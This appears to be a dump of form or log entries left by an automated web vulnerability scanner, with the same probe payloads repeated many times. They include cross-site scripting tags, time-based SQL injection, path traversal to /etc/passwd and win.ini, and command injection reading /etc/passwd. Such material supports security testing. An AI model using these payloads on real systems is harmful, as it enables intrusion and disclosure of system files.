../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(945451))>

1

"+response.write(9531085*9229330)+"

1

1

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<body onload=prompt(965347)>

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919658)>

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1

1<img src=xyz OnErRor=prompt(915563)>

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

${100130+99773}

1

-1

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(930838)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

1

-1)

1

1

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(955431)</sCripT>

1&n906884=v971036

1

-1))

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

1

Y2yTwXuG'

)

1

testasp.vulnweb.com

1

YCed9Hp7')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(915527) //\xf6>

!(()&&!|*|*|

'

1

1

'

kH6LIgiW'))

^(#$!@#$)(()))******

/etc/passwd

1<input autofocus onfocus=prompt(984413)>

'"()

1

"

"

-1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

1

&dir

1

1

-1))

http://hitrDXkqezvOa.bxss.me/

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_QvIYo <ScRiPt >prompt(971144)</ScRiPt>

1

1

1

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

Qm2KCPSq'

1

1

file:///etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

http://www.acunetix.tst

1

1

vkZGJudy')

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

comments

'"

1

WEB-INF/web.xml

1R92qVwT'))

1'"()&%<ScRiPt >prompt(960735)</ScRiPt>

1

<!--

comments/.

'|dir

1

'"()&%<ScRiPt >prompt(927088)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

1_986820

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu5224\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5224

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux3537\xc0\xbez1\xc0\xbcz2a\x90bcxuca3537

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(976487)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(926044)</script>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(923033)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973103></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(992051)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(955395)">

response.write(9500463*9555361)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952235)"></g></svg>

'+response.write(9500463*9555361)+'

1

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9500463*9555361)+"

1<div style=width:expression(prompt(984143))>

WEB-INF/web.xml

1

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(920213)>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959034)>

${99397+99376}

1

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=xyz OnErRor=prompt(955912)>

1&n961791=v971060

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(972955)>

|cat /etc/passwd#

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(958805)</sCripT>

)

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

-1)

1

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(967267) //\xf6>

testasp.vulnweb.com

"|"ld

-1))

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

'

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(996084)>

fa2qFDbA'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

"

1

1

1

1

'

DHShlKMs')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

"

1

lBHQU2KL'))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1_pwJpW <ScRiPt >prompt(926430)</ScRiPt>

1

http://hitIuOc4108YE.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

-1

1

1

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

-1)

1

1

comments

http://www.acunetix.tst

'&dir&'

1

'"

1

1'"()&%<ScRiPt >prompt(951639)</ScRiPt>

-1))

comments/.

1

'"()&%<ScRiPt >prompt(921121)</ScRiPt>

1

<!--

"&dir&"

file:///etc/passwd

1

1

1

yA6gWgIc'

1_937087

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

rDeKJvfb')

1

1

1

'|dir

WEB-INF/web.xml

BhtRoIRu'))

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

acu7240\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7240

1

1

1

../../../../../../../../../../boot.ini

acux2134\xc0\xbez1\xc0\xbcz2a\x90bcxuca2134

1

1<ScRiPt >prompt(917720)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(966533)</script>

1

1

1<ScRiPt >prompt(998116)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?918999></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(944013)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(983369)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9209413*9804468)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902143)"></g></svg>

1

'+response.write(9209413*9804468)+'

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9209413*9804468)+"

1<div style=width:expression(prompt(962824))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(961073)>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933497)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

WEB-INF/web.xml

1

${99134+99681}

1

1

1

`cat /etc/passwd`

-1

1<img src=xyz OnErRor=prompt(955028)>

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n956937=v945621

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(909628)>

|cat /etc/passwd#

-1)

1

1some_inexistent_file_with_long_name%00.jpg

)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

-1))

1<ScRiPt%20>prompt(996114)</sCripT>

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

1&lt

TruGf4Ut'

"|"ld

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

'

1

SPDrSHIG')

1

1

\xf6<img acu onmouseover=prompt(913035) //\xf6>

1

1

1

/etc/passwd

1

1<input autofocus onfocus=prompt(921882)>

1

K9mK83e5'))

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

http://hity2DZhiysXd.bxss.me/

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

[url=http://www.acunetix.com]website security[/url]

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

1_Njjrl <ScRiPt >prompt(941187)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

-1))

1

1

http://www.acunetix.tst

'"

&dir

1

1'"()&%<ScRiPt >prompt(914237)</ScRiPt>

1

rOAa24hK'

comments

<!--

1

'&dir&'

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(997506)</ScRiPt>

1

1

comments/.

7mIkHzAd')

1

/\../\../\../\../\../\../\../etc/passwd

1_907102

1

"&dir&"

1

1

mHwCNkid'))

1

1

WEB-INF/web.xml

1

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

acu3632\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3632

1

acux10139\xc0\xbez1\xc0\xbcz2a\x90bcxuca10139

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(972760)</ScRiPt>

1

"|dir

1

1<script>prompt(990487)</script>

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(937318)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927435></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(925120)</ScRiPt>

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(998571)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911239)"></g></svg>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(931717))>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<iframe src='data:text/html

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9247161*9466710)

1

&cat /etc/passwd&

1<body onload=prompt(962210)>

1

'+response.write(9247161*9466710)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906116)>

"+response.write(9247161*9466710)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(946814)>

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img/src=">" onerror=alert(953671)>

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(905670)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

${99684+100055}

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1)

1

\xf6<img acu onmouseover=prompt(948294) //\xf6>

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1<input autofocus onfocus=prompt(906013)>

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n945046=v969306

1

)

<a href='http://www.acunetix.com'>website security</a>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

z6cN6gFS'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

1

VIRUdRrb')

testasp.vulnweb.com

/etc/passwd

1

1

1_eEyyl <ScRiPt >prompt(952926)</ScRiPt>

1

wOnTQiQZ'))

'"()

^(#$!@#$)(()))******

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

-1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

1

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1))

1

http://hitVcioREFhFN.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

hCKu1BFO'

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

5JA30GfY')

1

http://www.acunetix.tst

file:///etc/passwd

comments

1

'"

1

a6Np12a5'))

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(970187)</ScRiPt>

comments

1

"&dir&"

1

<!--

1

1

WEB-INF/web.xml

1

comments/.

'"()&%<ScRiPt >prompt(950273)</ScRiPt>

|dir

1

WEB-INF\web.xml

1

1

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1_996330

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

acu6911\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6911

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acux5319\xc0\xbez1\xc0\xbcz2a\x90bcxuca5319

1

1

1<ScRiPt >prompt(907492)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(958009)</script>

1

1

1

1<ScRiPt >prompt(912950)</ScRiPt>

1

WEB-INF/web.xml

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925321></ScRiPt>

response.write(9075604*9265948)

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(955494)</ScRiPt>

1

'+response.write(9075604*9265948)+'

1<video><source onerror="javascript:prompt(999733)">

1

&cat /etc/passwd&

1

"+response.write(9075604*9265948)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967164)"></g></svg>

1

1

1

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(958836))>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

1

1

1<body onload=prompt(989454)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99542+99324}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968724)>

1

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=xyz OnErRor=prompt(969591)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

)

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&n945395=v957430

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1<img/src=">" onerror=alert(935189)>

!(()&&!|*|*|

'"()

1

testasp.vulnweb.com

'|'ld

1

1

1

^(#$!@#$)(()))******

1McpfQfd'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(926936)</sCripT>

1

1

1

"|"ld

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

bZkjddNP')

1

1

\xf6<img acu onmouseover=prompt(925773) //\xf6>

1

'

/etc/passwd

1

1

'

1

9XC8sCXW'))

1

1<input autofocus onfocus=prompt(984476)>

1

"

http://hitnFsDuYAjzV.bxss.me/

"

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

1

comments

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

1

comments

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1_lMPD8 <ScRiPt >prompt(923800)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

1

comments/.

'&dir&'

1

ZOAPK2jL'

'"

1

1

file:///etc/passwd

"&dir&"

1

1

1

1'"()&%<ScRiPt >prompt(996251)</ScRiPt>

<!--

1

OTvXCMwA')

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(983639)</ScRiPt>

u1VHB4EQ'))

1

1

1

1

WEB-INF/web.xml

'|dir

1

1_997973

1

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu5032\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5032

1

................windowswin.ini

1

1

acux1666\xc0\xbez1\xc0\xbcz2a\x90bcxuca1666

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(907118)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(918952)</script>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9873462*9744337)

1<ScRiPt >prompt(962535)</ScRiPt>

1

1

1

1

'+response.write(9873462*9744337)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953899></ScRiPt>

&cat /etc/passwd&

1

1

1

'&cat /etc/passwd&'

1<ScRiPt >prompt(993971)</ScRiPt>

"+response.write(9873462*9744337)+"

WEB-INF/web.xml

1

1

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1

1<video><source onerror="javascript:prompt(961392)">

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3.421),0)/*'XOR(if(now()=sysdate(),sleep(3.421),0))OR'"XOR(if(now()=sysdate(),sleep(3.421),0))OR"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920217)"></g></svg>

1

1

${99507+99909}

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(931704))>

(select(0)from(select(sleep(6.842)))v)/*'+(select(0)from(select(sleep(6.842)))v)+'"+(select(0)from(select(sleep(6.842)))v)+"*/

1

1

1&n924183=v946604

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

../../../../../../../../../../etc/passwd.jpg

1

-1

1<iframe src='data:text/html

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

!(()&&!|*|*|

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<body onload=prompt(919239)>

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

'"()

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991274)>

testasp.vulnweb.com

1

-1))

1

1<img src=xyz OnErRor=prompt(915891)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

DoLXcJnz'

1

'

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<img/src=">" onerror=alert(969434)>

1

bnVZrBqL')

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

/etc/passwd

||cat /etc/passwd

JpaA8lTF'))

1<ScRiPt%20>prompt(912960)</sCripT>

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

acunetix_wvs_invalid_filename

http://hitWfikyBOW4a.bxss.me/

1&lt

-1

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

-1)

1

1

\xf6<img acu onmouseover=prompt(917456) //\xf6>

comments

1

1

-1))

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments/.

'"

1<input autofocus onfocus=prompt(954610)>

http://www.acunetix.tst

1

No2sCu0z'

1'"()&%<ScRiPt >prompt(994159)</ScRiPt>

|dir

1

1

<!--

x4TsQwmb')

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(991778)</ScRiPt>

file:///etc/passwd

1

vPvEQwiM'))

[url=http://www.acunetix.com]website security[/url]

1

"|dir

1

1_989051

1_ArY0x <ScRiPt >prompt(975824)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu6999\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6999

../../../../../../../../../../boot.ini

1

1

1

acux9186\xc0\xbez1\xc0\xbcz2a\x90bcxuca9186

1

1<ScRiPt >prompt(925890)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(981700)</script>

1

1

1<ScRiPt >prompt(979108)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972881></ScRiPt>

1

1

1

1<ScRiPt >prompt(990199)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1
